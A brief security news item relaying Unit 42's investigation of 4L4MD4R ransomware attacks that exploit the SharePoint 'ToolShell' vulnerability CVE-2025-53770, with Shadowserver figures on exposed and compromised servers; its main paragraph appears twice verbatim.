Cybersecurity Dive reports that an investigation into a purported 4L4MD4R ransomware attack facilitated by the exploitation of Microsoft SharePoint "ToolShell" vulnerabilities has been commenced by Palo Alto Networks Unit 42 researchers.
Attackers believed not to have been linked to state-sponsored activity have not only deactivated real-time Windows Defender monitoring via PowerShell commands but also circumvented certificate validation to enable 4L4MD4R ransomware compromise, according to Unit 42 researchers, who are still looking into similar ransomware intrusions against other organizations. More than 800 of 17,000 internet-exposed Microsoft SharePoint instances remained vulnerable to the critical flaw, tracked as CVE-2025-53770, with at least 20 of the said servers having been compromised with web shells, data from The Shadowserver Foundation revealed. Such findings come as at least 300 organizations, including U.S. government agencies, were reported to have been compromised in attacks involving the SharePoint vulnerabilities, some of which have been led by Chinese state-sponsored threat operations.
Attackers believed not to have been linked to state-sponsored activity have not only deactivated real-time Windows Defender monitoring via PowerShell commands but also circumvented certificate validation to enable 4L4MD4R ransomware compromise, according to Unit 42 researchers, who are still looking into similar ransomware intrusions against other organizations. More than 800 of 17,000 internet-exposed Microsoft SharePoint instances remained vulnerable to the critical flaw, tracked as CVE-2025-53770, with at least 20 of the said servers having been compromised with web shells, data from The Shadowserver Foundation revealed. Such findings come as at least 300 organizations, including U.S. government agencies, were reported to have been compromised in attacks involving the SharePoint vulnerabilities, some of which have been led by Chinese state-sponsored threat operations.
